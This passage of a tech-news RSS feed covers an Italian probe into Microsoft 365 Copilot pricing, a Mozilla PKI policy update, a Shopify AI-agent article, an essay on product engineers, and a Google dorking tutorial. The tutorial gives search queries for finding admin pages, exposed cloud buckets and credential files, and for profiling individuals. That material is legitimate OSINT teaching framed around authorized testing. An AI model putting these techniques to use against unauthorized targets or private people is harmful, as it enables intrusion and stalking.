<description><![CDATA[Italy’s competition watchdog has opened an investigation into Microsoft over concerns it may not have clearly informed consumers about the integration of Copilot and Designer into Microsoft 365 subscriptions, associated price increases, and automatic upgrades to higher-cost plans.



The Italian ...]]></description>
<link>https://tsecurity.de/de/3632947/it-nachrichten/italian-watchdog-probes-microsoft-as-m365-price-change-looms/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3632947/it-nachrichten/italian-watchdog-probes-microsoft-as-m365-price-change-looms/</guid>
<pubDate>Mon, 29 Jun 2026 15:03:27 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Italy’s competition watchdog has opened an investigation into Microsoft over concerns it may not have clearly informed consumers about the integration of Copilot and Designer into Microsoft 365 subscriptions, associated price increases, and automatic upgrades to higher-cost plans.</p>



<p>The Italian Competition Authority (AGCM), in a <a href="https://en.agcm.it/en/media/press-releases/2026/6/PS13129" target="_blank" rel="noreferrer noopener">statement</a> to the press, said it had opened an investigation into Microsoft S.r.l., the vendor’s Italian subsidiary, and Microsoft Ireland Operations Ltd. to assess whether the way the changes to M365 pricing were communicated may have unduly restricted consumers’ freedom of choice.</p>



<p>Although the AGCM’s announcement does not explicitly identify the pricing event under investigation, its description aligns with Microsoft’s <a href="https://www.microsoft.com/en-us/microsoft-365/blog/2025/01/16/copilot-is-now-included-in-microsoft-365-personal-and-family/">January 2025 rollout</a> of Copilot and Designer for Microsoft 365 Personal and Family subscribers.</p>



<p>At the time, Microsoft announced its first price increase for the consumer subscriptions since the launch of <a href="https://www.computerworld.com/article/3806855/copilot-ai-microsoft-365.html" target="_blank">Copilot</a> and Designer, stating that existing subscribers would pay the higher price at their next renewal after the AI features were added.</p>



<h2 class="wp-block-heading">Could scrutiny spread beyond Italy?</h2>



<p>The Italian probe is not the first time Microsoft’s communication around AI-related Microsoft 365 pricing has drawn regulatory attention.</p>



<p>The investigation follows earlier scrutiny of Microsoft’s consumer <a href="https://www.computerworld.com/article/4085852/microsoft-issues-apology-for-misleading-microsoft-365-pricing-plans.html" target="_blank">pricing communications</a> in Australia and New Zealand, where Microsoft apologized and revised some of its messaging after regulators raised concerns over how AI-enabled Microsoft 365 subscriptions were presented to customers.</p>



<p>That episode could prove relevant for the current investigation, even though the legal frameworks differ, said <a href="https://pareekh.com/about/" target="_blank" rel="noreferrer noopener">Pareekh Jain</a>, principal analyst at Pareekh Consulting.</p>



<p>“Microsoft’s apology and revised communications show similar concerns were raised before,” the analyst said.</p>



<p>“While the legal cases differ, Italian regulators may see it as evidence that clearer customer communication was already known to be necessary,” he added.</p>



<p>Jain also expects regulators elsewhere to watch the outcome of the Italian investigation: “Regulators in the EU, UK, Australia, New Zealand, and Canada are likely to watch closely, especially where AI is bundled into existing subscriptions with higher prices or automatic renewals.”</p>



<h2 class="wp-block-heading">Enterprise buyers are likely to scrutinize AI pricing more closely</h2>



<p>Whether the Italian investigation ultimately results in penalties against Microsoft remains to be seen, but analysts say the probe could have an impact on M365 commercial plans, which are <a href="https://www.microsoft.com/en-us/microsoft-365/blog/2025/12/04/advancing-microsoft-365-new-capabilities-and-pricing-update/" target="_blank" rel="noreferrer noopener">separate</a> and <a href="https://www.computerworld.com/article/4101827/m365-customers-should-explore-alternatives-plan-to-dicker-as-prices-hikes-loom-analysts.html" target="_blank">set to take effect on July 1</a>.</p>



<p>The investigation serves as a reminder for enterprises to examine AI-related price changes even if Microsoft’s commercial licensing process seems more transparent than its consumer subscription model, Jain said. “CIOs should still verify what is changing at renewal and whether AI features are optional.”</p>



<p>Enterprise procurement teams should ask tougher questions during negotiations, said <a href="https://www.linkedin.com/in/bhupendrachopra" target="_blank" rel="noreferrer noopener">Bhupendra Chopra</a>, chief revenue officer at IT consulting firm Kanerika.</p>



<p>“Procurement teams should ask questions, such as what AI am I paying for, can I see it itemized, and can I decline it without losing the rest? Buyers would be right to want AI pricing written into renewal terms with clear opt-outs and price protection,” Chopra said.</p>



<p>These questions, according to Jain, could provide additional leverage during licensing discussions to negotiate flexible terms.</p>



<p>However, Chopra pointed out that the investigation is symptomatic of a broader tension between software vendors’ efforts to integrate AI into existing products and regulators’ expectations around transparency and customer choice.</p>



<p>“Building AI into existing products and pricing it in is becoming standard across software, not unique to one vendor. Regulators are testing an old question against a new feature — whether buyers were given clear information and a real choice,” the analyst said.</p>



<p>For enterprises, the analyst added, the practical takeaway is straightforward: “Expect AI to show up inside the tools you already own, expect it to carry a cost, and review what each renewal actually includes. Treated as routine cost discipline, it stops being a surprise.”</p>



<p>Microsoft did not respond to a request for comment. Computerworld has also reached out to the Italian Competition Authority for additional details about the scope of the investigation.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Improving Transparency and Assurance in the Web PKI: Mozilla Root Store Policy v3.1]]></title>
<description><![CDATA[Mozilla remains committed to maintaining a secure, trustworthy, and transparent Web PKI. Today we are announcing the publication of Mozilla Root Store Policy (MRSP) version 3.1, effective July 1, 2026. … Read more
The post Improving Transparency and Assurance in the Web PKI: Mozilla Root Store Po...]]></description>
<link>https://tsecurity.de/de/3632784/it-security-nachrichten/improving-transparency-and-assurance-in-the-web-pki-mozilla-root-store-policy-v31/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3632784/it-security-nachrichten/improving-transparency-and-assurance-in-the-web-pki-mozilla-root-store-policy-v31/</guid>
<pubDate>Mon, 29 Jun 2026 13:53:31 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Mozilla remains committed to maintaining a secure, trustworthy, and transparent Web PKI. Today we are announcing the publication of Mozilla Root Store Policy (MRSP) version 3.1, effective July 1, 2026. … <a class="go" href="https://blog.mozilla.org/security/2026/06/29/improving-transparency-and-assurance-in-the-web-pki-mozilla-root-store-policy-v3-1/">Read more</a></p>
<p>The post <a href="https://blog.mozilla.org/security/2026/06/29/improving-transparency-and-assurance-in-the-web-pki-mozilla-root-store-policy-v3-1/">Improving Transparency and Assurance in the Web PKI: Mozilla Root Store Policy v3.1</a> appeared first on <a href="https://blog.mozilla.org/security">Mozilla Security Blog</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hacking With Google]]></title>
<description><![CDATA[Using Search Engines for Dorking and ReconnaissanceGoogle is one of the most powerful tools in a security researcher’s arsenal — not just for looking things up, but for finding specific information about targets, vulnerabilities, exposed assets, and people. This technique is known as Google dorki...]]></description>
<link>https://tsecurity.de/de/3632620/hacking/hacking-with-google/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3632620/hacking/hacking-with-google/</guid>
<pubDate>Mon, 29 Jun 2026 12:21:08 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Using Search Engines for Dorking and Reconnaissance</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*wlvVOSqqilwT9LAegoX5Pw.jpeg"></figure><p>Google is one of the most powerful tools in a security researcher’s arsenal — not just for looking things up, but for finding specific information about targets, vulnerabilities, exposed assets, and people. This technique is known as <strong>Google dorking</strong>, and it’s a core part of open source intelligence (OSINT) gathering during penetration tests, bug bounties, and vulnerability disclosure programs.</p><p>If you’d like to follow what I did via video, feel free to check it out on YouTube below:</p><a href="https://medium.com/media/a58d6b7cbe6186a6661fe64a3a79b6c8/href">https://medium.com/media/a58d6b7cbe6186a6661fe64a3a79b6c8/href</a><h3>Researching Vulnerabilities by Service Version</h3><p>One of the most straightforward uses of Google in security research is looking up known vulnerabilities for a specific service version. When an Nmap scan reveals that a target is running, say, vsftpd 2.3.4, the next step is simply searching for it in Google:</p><pre>vsftpd 2.3.4 exploit</pre><p>This returns CVE entries from NIST (the National Institute of Standards and Technology — the gold standard for vulnerability documentation), Rapid7’s Metasploit module database, Nmap NSE scripts, and community walkthroughs. The same approach applies to any software version discovered during reconnaissance: a web application running jQuery 3.1.1, an outdated CMS, an exposed API framework. Search the version plus “exploit” or “vulnerability” and see what’s documented.</p><p>This is a fundamental part of the research process during any security assessment.</p><h3>Google Dorks: Advanced Search Operators</h3><p>Google dorking refers to using Google’s built-in search operators in precise combinations to return highly specific results. Here’s a breakdown of the most useful ones.</p><h4>Exact phrases with quotes</h4><p>Wrapping a term in quotes forces Google to match it exactly. Say for example, you are researching a person for an investigation or an executive for an external penetration test that includes social engineering:</p><pre>"John Smith"</pre><p>This eliminates loosely related results and focuses the search on that exact string.</p><h4>Combining terms to narrow results</h4><p>Adding additional keywords refines the search further if you want to search for that person and a possible wedding, out of say a specific city and state:</p><pre>"John Smith" wedding Sacramento California</pre><p>The more context you add, the more targeted the results become.</p><h4>Wildcard operator ( * )</h4><p>An asterisk acts as a wildcard, substituting for any word or character. Think of regular expressions as they apply to searching text files in a Linux environment. You can add this to someone’s name, for example, to search for anyone with a middle initial in that name:</p><pre>"John * Smith"</pre><p>This returns results for John Smith with any middle name or initial — useful when you know a name but not all the details.</p><h4>Site operator (site:)</h4><p>This restricts results to a specific domain or site. An example could be trying to find a social media profile for “John Smith” in instagram:</p><pre>"John Smith" site:instagram.com</pre><p>This can also be great for limiting research to a particular organization’s web presence.</p><h4>Minus operator (-)</h4><p>A minus sign excludes specific terms or sites from results. This is great for filtering results and narrowing things down like searching for subdomains:</p><pre>"John Smith" -"John L. Smith"</pre><h4>File type operator (filetype:)</h4><p>Finds specific file types indexed by Google:</p><pre>"John * Smith" site:.gov filetype:pdf</pre><p>This returns PDFs from government websites matching the name pattern — potentially useful for finding resumes, reports, or documents containing contact information and professional details. In a penetration test context, the same technique can uncover exposed configuration files, credentials stored in text files, or publicly accessible code.</p><h4>URL and page content operators</h4><ul><li>inurl: — searches for a specific string within the URL itself</li><li>intitle: — searches within the page title</li><li>intext: — searches within the body text of a page</li></ul><p>For example:</p><pre>site:example.com inurl:admin</pre><p>This looks for admin panels on a specific domain — a common check during web application penetration tests and bug bounties.</p><h3>Subdomain Enumeration with Google</h3><p>During web application reconnaissance, finding subdomains is an important step. Google can help surface subdomains that have been indexed:</p><pre>site:*.example.com</pre><p>As you discover subdomains, subtract them from future searches to avoid seeing the same results and uncover new ones:</p><pre>site:*.example.com -www -careers</pre><p>This iterative process of finding and subtracting results helps surface less obvious subdomains that may have weaker security configurations or expose additional attack surface. That said, Google is just one of many tools for subdomain enumeration — tools like Sublist3r, Subfinder, and Amass are also commonly used alongside certificate transparency log parsing.</p><h3>Finding Exposed Cloud Assets</h3><p>Google can also index publicly exposed cloud storage buckets that organizations didn’t intend to make discoverable:</p><pre>site:s3.amazonaws.com "example company"</pre><p>or</p><pre>site:amazonaws.com "example company"</pre><p>Exposed S3 buckets occasionally contain sensitive information — internal documents, credential files, username naming conventions, or configuration data — that can be valuable during a security assessment. This is a well-known misconfiguration and a common finding in bug bounty programs.</p><h3>The Google Hacking Database</h3><p>The <strong>Google Hacking Database (GHDB)</strong>, maintained by Exploit-DB, is a public repository of pre-built Google dorks contributed by the security community. It covers categories like:</p><ul><li>Finding sensitive files and directories</li><li>Identifying exposed login pages</li><li>Locating vulnerable web applications</li><li>Discovering publicly accessible network devices</li></ul><p>It’s a valuable reference, especially when starting out with Google dorking. Browsing the database gives you a sense of what’s possible and provides ready-to-use queries you can adapt for your own research.</p><h3>Summary of Key Operators</h3><ul><li>"quotes" Match exact phrase</li><li>* Wildcard for any word</li><li>- Exclude a term or site</li><li>site: Restrict to a specific domain</li><li>filetype: Find specific file types</li><li>inurl: Search within URLs</li><li>intitle: Search within page titles</li><li>intext: Search within page body text</li></ul><p>Google dorking is a passive reconnaissance technique — you’re querying publicly available, indexed information. However, it’s still important to only use these techniques against systems and targets you have explicit permission to test. Bug bounty programs and vulnerability disclosure programs (VDPs) are legitimate contexts for this kind of research. Targeting organizations without authorization is illegal regardless of the method used.</p><p>This is a skill that improves with practice. Start with the operators above, explore the Google Hacking Database, and apply these techniques within the scope of legitimate security research. The more precisely you can query, the more useful the results become.</p><p>Checkout my <a href="https://www.youtube.com/@Red-2876">YouTube</a></p><p><a href="https://buymeacoffee.com/coderedblog">Buy me a coffee!</a></p><p>Feel free to follow me on here and keep learning!</p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=26b8e134ee22" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/hacking-with-google-26b8e134ee22">Hacking With Google</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[When software developers and AI agents share the learning]]></title>
<description><![CDATA[Before Tobi Lütke ran Shopify, he learned programming through Germany’s apprenticeship system⁠, the way people have learned trades forever: in a shared workshop, watching people who already knew what they were doing. More recently, describing Shopify’s River, he reached for a related word: Lehrwe...]]></description>
<link>https://tsecurity.de/de/3632384/ai-nachrichten/when-software-developers-and-ai-agents-share-the-learning/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3632384/ai-nachrichten/when-software-developers-and-ai-agents-share-the-learning/</guid>
<pubDate>Mon, 29 Jun 2026 11:04:10 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Before Tobi Lütke ran Shopify, he <a href="https://tobi.lutke.com/blogs/news/11280301-the-apprentice-programmer">learned programming</a> through Germany’s apprenticeship system⁠, the way people have learned trades forever: in a shared workshop, watching people who already knew what they were doing. More recently, <a href="https://x.com/tobi/status/2053121182044451016">describing Shopify’s River</a>, he reached for a related word: <em>Lehrwerkstatt</em>⁠, a teaching workshop where “the whole shop floor is the classroom.”</p>



<p>X has been agog by the numbers around <a href="https://shopify.engineering/under-the-river">River</a>⁠, Shopify’s Slack-native <a href="https://www.infoworld.com/article/3611465/how-ai-agents-will-transform-the-future-of-work.html">AI agent</a>. In total, 5,938 Shopify employees worked with River across 4,450 different Slack channels, and River now coauthors roughly one in eight merged pull requests across the company. It’s a big deal, but understanding <em>why</em> it works that way is the most important part.</p>



<p>River can read code, run tests, open pull requests, query the data warehouse, inspect production traces, and sometimes push back on a plan it thinks is bad. Great. Lots of companies will have clever coding agents someday soon. Some already do.</p>



<p>The interesting part is that River doesn’t work alone; it works where everyone can see it.</p>



<h2 class="wp-block-heading"><a></a>Betting on the workshop</h2>



<p>I’ve already <a href="https://www.infoworld.com/article/4142019/coding-for-agents.html">argued that agents reward explicit, consistent, well-documented software</a>. They like the “boring” stuff, such as schemas, tests, conventions, clean setup instructions, and codebases that don’t require a deep retrospective with the one engineer who remembers why the build script has to run twice. Dropping an agent into a messy repo is mostly an efficient audit of your engineering discipline. Agents hold up a mirror to our engineering practices.</p>



<p>This is where Shopify comes off looking good. Without all the engineering pre-work, River wouldn’t be a success. In early 2024⁠, the company says it had many repositories, bespoke development environments, and slow feedback loops. It then made two unpopular but critically important choices: moved to a monorepo called World and built dev environments, continuous integration, and production images on <a href="https://shopify.engineering/what-is-nix" data-type="link" data-id="https://shopify.engineering/what-is-nix">Nix</a> as one reproducible substrate.</p>



<p>Shopify recognized that “code is going to be increasingly written with AI, and our infrastructure needs to be the substrate for that.” But the company did more than insist on legible code: It started to create shared memory of that code across the company.</p>



<h2 class="wp-block-heading"><a></a>Collective coding</h2>



<p>River has one design constraint that every enterprise architect should pay attention to: It only works in public Slack channels. No direct messages. No private groups. You summon River where other people can watch, join, search, and learn. That sounds like a small product choice, but it’s not. It’s the operating model, kind of like open sourcing code development within Slack.</p>



<p>Because of this design constraint, every River session becomes a visible transcript. Shopify can then mine those transcripts, see recurring patterns, and feed them back into River’s skills, prompts, and defaults. One engineer’s hard-won fix at two o’clock becomes the next engineer’s starting point at four o’clock. The model doesn’t need to be retrained for the company to get smarter, and developers don’t need to go out of their way to document things. The work just has to leave a trace.</p>



<p>That’s the <em>Lehrwerkstatt</em>, productized. Everyone gets to watch the agent work.</p>



<p>Now compare that with how most enterprises are deploying AI. One developer works with a private chatbot in a private IDE in a private window that no one else will ever see. Multiply that by a few thousand. Each person discovers a clever way to investigate a flaky test, explain a troublesome service boundary, or avoid a migration trap. Then the session closes, and the discovery dies. Sure, the developer may go faster, but the company is no better off than it was yesterday.</p>



<h2 class="wp-block-heading"><a></a>The transcript is the artifact</h2>



<p>One mistake enterprises have made with knowledge management is treating documentation as something people write <em>after</em> the work. This rarely works. Few employees (developers or otherwise) want to undertake the tedium of documenting what they already did. Not unless someone is paying them to do it.</p>



<p>River suggests a better pattern: The work itself creates the documentation.</p>



<p>Not every transcript is useful, of course. Most probably aren’t. But the useful ones can become skills, defaults, examples, runbooks, repo instructions, or links that help the next person avoid starting from zero. Shopify says River sessions are searchable and reproducible, and the company feeds patterns from those sessions back into River’s skills, prompts, and defaults. That’s not a chatbot; it’s a learning loop.</p>



<p>This is where the usual “AI will make developers more productive” framing feels too small. The more interesting claim is that AI can make software organizations more teachable. However, this won’t happen by default. The shop floor needs to be institutionalized or the enterprise will remain an atomized collection of productivity silos.</p>



<h2 class="wp-block-heading">A magic memory file</h2>



<p>This is where <code><a href="https://agents.md/">agents.md</a>⁠</code> is useful, but only if properly used. <code>agents.md</code> describes itself as a README for agents and says it’s now used by more than 60,000 open source projects. How should a developer use it? GitHub, based on<a href="https://github.blog/ai-and-ml/github-copilot/how-to-write-a-great-agents-md-lessons-from-over-2500-repositories/"> analysis of more than 2,500 repositories</a>⁠, gives some clear guidance: Put commands early, be specific, provide real examples, and set explicit boundaries.</p>



<p>In other words, write down what matters.</p>



<p>But don’t mistake the file for the capability. ETH Zurich researchers recently<a href="https://arxiv.org/abs/2602.11988"> </a><a href="https://arxiv.org/abs/2602.11988">tested whether repository-level context files actually help coding agents</a>⁠ and found that they often reduce task success while increasing inference cost by more than 20%. InfoQ <a href="https://www.infoq.com/news/2026/03/agents-context-file-value-review/">summarized⁠</a> their finding this way: LLM-generated context files often hurt, and human-written ones should focus on non-inferable details, such as custom tools, unusual build commands, and highly specific project constraints.</p>



<p>That’s the enterprise opportunity.</p>



<p>Public GitHub projects often don’t have much non-inferable domain knowledge to encode, but enterprise software is filled with it: odd quirks such as why the pricing service can’t be called during checkout in a certain region, or which legacy API looks dead but still supports a major customer, or why the data model says one thing but revenue recognition says another. Etc., etc.</p>



<p>That’s the context worth preserving, rather than directory maps an agent can discover or generic coding preferences. That’s what the shop-floor version of <code>agents.md</code> looks like: Not a static file that someone auto-generates and forgets, but rather the residue of observed work. Agents struggle, humans correct, patterns emerge, and only the durable lessons become instructions.</p>



<h2 class="wp-block-heading"><a></a>You’re not Shopify</h2>



<p>If all this sounds great (and it should), then it’s worth a word of warning: You probably won’t be able to copy Shopify, any more than you could have (or should have) <a href="https://www.infoworld.com/article/2260708/no-you-dont-have-to-run-like-google.html">copied Google</a>. You’re not Shopify. Most companies shouldn’t wake up Monday and announce a monorepo migration, a Nix conversion, and a Slack-only agent because River sounds cool. That approach has worked for Shopify, but it doesn’t mean it will work for you.</p>



<p>The useful approach for any company that isn’t Shopify is to ask different questions: Where does <a href="https://www.infoworld.com/article/3812583/what-you-need-to-know-about-developing-ai-agents.html">agent</a> work happen in your company and who learns from it? If the answers are “in private” and “nobody,” you’ve got problems. I’m not saying that every agent session belongs in a public channel. You absolutely should <em>not </em>dump customer data, security incidents, HR issues, or privileged production context into a companywide AI water cooler. Boundaries still matter. In some cases, they matter more because agents can move faster and touch more systems than humans do, <a href="https://www.infoworld.com/article/4021238/why-llms-demand-a-new-approach-to-authorization.html">as I’ve warned</a>.</p>



<p>But the principle survives the caveats: Agent work should be inspectable, reusable, and improvable where appropriate. The organization should be able to see the path from question to tool call to failed attempt to correction to pull request to reusable knowledge.</p>



<h2 class="wp-block-heading"><a></a>Shared learning is the new (old) way</h2>



<p>For years, developer experience mostly meant removing friction for individuals: faster setup, better docs, nicer APIs, etc. Those are all still good. But agentic development adds a new requirement: shared learning.</p>



<p>A great developer experience now needs other things: Can the next developer benefit from the last agent session? Can the agent explain not just what it changed, but what it learned? Can a private breakthrough become a team asset without creating a surveillance nightmare? And no, visibility isn’t surveillance, and the goal is not to grade every keystroke or turn developers into content producers for the corporate memory machine. The goal is to make valuable work observable enough that it compounds.</p>



<p>This is a management problem as much as a tools problem. Developers will use agents because agents help them get work done. At this point, you’d struggle to get them to stop. Still, they won’t voluntarily produce beautiful organizational memory as a side effect unless the workflow makes it natural. You need to make the shared shop floor the golden path, as <a href="https://www.infoworld.com/article/4125409/ai-will-not-save-developer-productivity.html">I’ve applied in various ways for years</a>.</p>



<p>In the River story, humans are still the teachers. The organization is still responsible for deciding what counts as good work. The system still needs judgment, taste, security, cost control, and review. The magic happens when all this work is done in the open where the organization can learn from the teaching.</p>



<p>That’s the real promise of agentic coding inside enterprises. Not that every developer gets a private genius, but rather that every developer can tap into collective genius. Lütke learned his trade in a room where the craft was visible, and apprentices learned by watching the work. The companies that win the agent era will rebuild that room for software.</p>



<p>In short, the smartest thing your AI can do isn’t to code faster. It’s to work in public.</p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[The rise of the product engineer: How AI is reshaping modern tech teams]]></title>
<description><![CDATA[The end of pure specialization



For years, software organizations optimized around specialization. Product managers owned requirements. Engineers owned implementation. Designers owned UX. QA owned quality. The model worked – until product velocity became a competitive advantage measured in week...]]></description>
<link>https://tsecurity.de/de/3632374/it-nachrichten/the-rise-of-the-product-engineer-how-ai-is-reshaping-modern-tech-teams/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3632374/it-nachrichten/the-rise-of-the-product-engineer-how-ai-is-reshaping-modern-tech-teams/</guid>
<pubDate>Mon, 29 Jun 2026 11:03:11 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<h2 class="wp-block-heading">The end of pure specialization</h2>



<p>For years, software organizations optimized around specialization. Product managers owned requirements. Engineers owned implementation. Designers owned UX. QA owned quality. The model worked – until product velocity became a competitive advantage measured in weeks instead of quarters.</p>



<p>Today, AI is accelerating another shift that I believe will fundamentally reshape how high-performing technology teams operate: the rise of the product engineer.</p>



<p>As Chief Technology Officer of akirolabs, an AI-augmented strategic procurement platform serving enterprise-scale clients, including Fortune 500 organizations, I’ve spent the last several years evolving our engineering model through three distinct stages. First, I dismantled highly specialized silos. Then I transitioned the organization toward more flexible generalists. Eventually, our operating model revealed that the teams performing best in the AI era were neither traditional specialists nor pure generalists, but engineers deeply embedded in product thinking and business context. I formalized and operationalized this role internally as a product engineer model, adapting an increasingly common industry pattern to enterprise AI delivery.</p>



<p>This role does not replace product managers. Instead, this operating model elevates strong product managers by removing operational friction. In our organization, product managers became more focused on customers, roadmap prioritization, requirement validation and strategic direction. With the help of AI-assisted prototyping and vibe-coding tools, they also became more technical,<a href="https://www.cio.com/article/4135451/6-strategies-for-accelerating-it-modernization.html"> </a><a href="https://www.cio.com/article/4135451/6-strategies-for-accelerating-it-modernization.html">capable of creating early concepts</a> and functional drafts before engineering implementation even began.</p>



<p>At the same time, engineers developed a much deeper understanding of the product domain, customer workflows and business priorities. Instead of waiting for every edge-case clarification or micro-decision from product leadership, they became capable of making many<a href="https://www.cio.com/article/4171890/ai-is-rewriting-the-software-development-playbook.html"> </a><a href="https://www.cio.com/article/4171890/ai-is-rewriting-the-software-development-playbook.html">product-level decisions independently</a> within clearly defined boundaries.</p>



<p>I translated this operating model into three repeatable principles, which I structured as a corporate playbook:</p>



<ul class="wp-block-list">
<li><strong>Product context ownership.</strong> Engineers are expected to deeply understand customer workflows and business goals, not just technical tasks.</li>



<li><strong>Distributed decision-making.</strong> Teams are empowered to make smaller product and implementation decisions without escalating everything upward.</li>



<li><strong>AI-native execution.</strong> Engineers use AI tools not as assistants for isolated coding tasks, but as integrated collaborators throughout delivery cycles.</li>
</ul>



<p>That combination fundamentally changed how our teams operated.</p>



<h2 class="wp-block-heading">What the product engineer changes</h2>



<p>The operational impact became visible relatively quickly.</p>



<p>Internal operating metrics collected across engineering delivery cycles indicate that development velocity improved by approximately 15-25% after the operating model was introduced. Refinement meetings became shorter and less frequent because engineers already understood the “why” behind features, not just the technical requirements. The release timelines decreased by at least 10-15% for the same scopes. Measurements were conducted across release cycles over a period of 12 months and included delivery speed, refinement time and production defects.</p>



<p>The gains became even more noticeable once AI development tools entered daily workflows. Product engineers are often particularly well positioned to work effectively with AI coding systems because they understand both technical implementation and product intent. They can formulate better prompts, decompose problems correctly and validate AI-generated outputs without requiring multiple translation layers between product and engineering teams. After integrating the product engineer operating model with modern AI tooling, our engineering organization recorded reductions of up to 35-45% in selected<a href="https://www.cio.com/article/4134741/how-agentic-ai-will-reshape-engineering-workflows-in-2026.html"> development and iteration cycles</a>, reducing feature delivery cycle times from months to weeks.</p>



<p>While the effects cannot be isolated with scientific precision, internal measurements consistently indicated improvements after both organizational and tooling changes.</p>



<p>But the most important change was not speed. It was ownership. Traditional engineering structures often unintentionally discourage responsibility. Engineers become ticket executors instead of product contributors. Every ambiguous decision escalates upward to leadership, creating organizational bottlenecks that slow down execution and drain management capacity.</p>



<p>The product engineer model distributes decision-making more effectively. Many small- and medium-sized product decisions that previously required involvement from the executive suite can now be handled directly by engineers with strong domain understanding. This significantly reduces leadership overhead while increasing team autonomy.</p>



<p>At the same time, communication overhead decreases across the organization. Fewer refinement meetings are needed. Teams spend less time waiting for clarifications or approvals. The “bus factor” also improves significantly because more engineers can contribute across multiple parts of the product instead of relying on isolated domain experts. For agile enterprise platforms operating at our scale, this becomes especially important during vacations, employee transitions or periods of rapid growth.</p>



<p>While architecting this operating model, I also observed a profound shift in quality control. Engineers with real ownership become substantially more engaged in product quality and business outcomes. During the first six months following implementation, the number of production bugs decreased by roughly 25% while engineering engagement and initiative noticeably increased over time. Escaped defects declined further as teams began treating early issue prevention as a measurable engineering objective.</p>



<p>One example stood out particularly clearly. During a customer-facing enterprise feature rollout involving complex workflow customization requirements, the engineering pod was able to independently clarify edge cases, prototype implementation approaches with AI tooling and finalize several product-level decisions without waiting for additional product management cycles. What previously would have required multiple refinement sessions and cross-functional approvals was delivered within a significantly shorter release window while maintaining enterprise-grade quality standards.</p>



<p>For leadership teams, the effect is equally important. As CTO, I redesigned operating constraints that had previously created execution bottlenecks, allowing greater organizational focus toward strategy, customer relationships, architecture and long-term product direction. In fast-moving organizations, that shift alone can materially improve execution capacity.</p>



<h2 class="wp-block-heading">What would it take to scale this model effectively</h2>



<p>However, this model is not easy to implement. The biggest challenge is talent.</p>



<p>Not every engineer can become an effective product engineer. The role requires technical depth, product intuition, communication skills, business awareness and strong self-management. Hiring becomes more difficult because companies must evaluate candidates beyond coding ability alone. Organizations often face two options: conduct a far more selective hiring process or invest heavily in developing existing engineers into broader product-minded contributors. Both paths require significantly more effort and expense than traditional engineering structures.</p>



<p>There are also operational traps. One of the most dangerous mistakes is delegating product authority too early without sufficient leadership oversight or organizational maturity. Strong product engineers require strong frameworks around them: disciplined release processes, clear accountability boundaries, reliable testing infrastructure and experienced technical leadership. That operational rigor matters especially for us when supporting enterprise-scale environments and organizations operating at Fortune 500 scale, including Raiffeisen Bank International, Bertelsmann, Axpo, IFF and Ahold Delhaize, where stability and reliability are non-negotiable. In our organization, I introduced operating controls that reduced distributed<a href="https://www.cio.com/article/4167420/i-gave-our-developers-an-ai-coding-assistant-the-security-team-nearly-mutinied.html"> decision-making risks</a> through multi-stage testing environments, structured release management, automated validation pipelines and layered automated and manual review processes before production deployments.</p>



<p>AI introduces another layer of complexity. Some engineers overestimate the capabilities of AI tools and begin trusting generated outputs without proper validation. Others remain overly skeptical and underutilize tools that can dramatically improve productivity.<a href="https://www.cio.com/article/4124515/the-ai-productivity-trap-why-your-best-engineers-are-getting-slower.html"> </a><a href="https://www.cio.com/article/4124515/the-ai-productivity-trap-why-your-best-engineers-are-getting-slower.html">Maintaining the right balance</a> requires active involvement from engineering leadership and internal AI expertise.</p>



<p>Product engineers operate with greater autonomy, which means weak execution habits become far more visible and potentially far more damaging. This is why experienced leadership remains critical even in highly autonomous organizations.</p>



<h2 class="wp-block-heading">The future of AI-native engineering organizations</h2>



<p>Despite these challenges, I believe this organizational shift is only beginning.</p>



<p>For years, software development was optimized around specialization because communication costs between humans were lower than coordination costs between systems. AI changes that equation. As implementation becomes increasingly accelerated by AI, organizational bottlenecks – not coding itself – become the primary constraint on execution speed. The<a href="https://www.cio.com/article/4180863/how-a-20-engineer-team-delivers-enterprise-ai-systems-at-fortune-500-scale.html"> </a><a href="https://www.cio.com/article/4180863/how-a-20-engineer-team-delivers-enterprise-ai-systems-at-fortune-500-scale.html">companies that adapt fastest may not be the ones with the largest engineering departments</a>. They may be the organizations that redesign engineering roles around ownership, product understanding and AI-native execution.</p>



<p>The product engineer model is ultimately not about combining responsibilities under a new title. It reflects a broader shift toward embedding product judgment directly into engineering execution and building teams capable of thinking, deciding and delivering at the speed modern products now demand.</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><strong><a href="https://www.cio.com/expert-contributor-network/">Want to join?</a></strong></p>



<p></p>
